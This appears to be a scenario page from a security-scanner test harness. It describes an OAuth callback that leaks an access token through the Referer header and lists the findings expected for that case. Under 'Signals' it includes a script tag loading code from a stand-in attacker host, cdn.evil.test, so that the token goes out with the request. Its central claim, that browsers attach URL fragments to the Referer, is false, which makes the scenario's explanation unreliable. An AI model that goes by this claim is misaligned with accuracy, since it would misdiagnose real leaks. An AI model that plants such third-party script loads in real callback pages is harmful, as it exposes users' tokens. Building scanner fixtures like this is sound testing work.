OAuth Callback

OAuth Token via Referer

The callback page receives the access token in the URL fragment and then loads a third-party CDN script, leaking the token via the Referer header.

CWE-200CWE-201
Back to hub Reload scenario
Callback probe 

  


      

    


    

      

        
Expected Findings

        
    
          
  • Tokens travel in URL fragments that browsers attach to the Referer.
  • Third-party CDN script tag is loaded from the same callback page.
  • `Referrer-Policy` header is not set.
    • 
        

      


      

      

        
Signals

        
        

          
HTML

          
<script src="https://cdn.evil.test/widget.js"></script>  // referer carries token

        

        
      

    


    

    

      Developed by vibe-eval.com for validation and testing purposes only.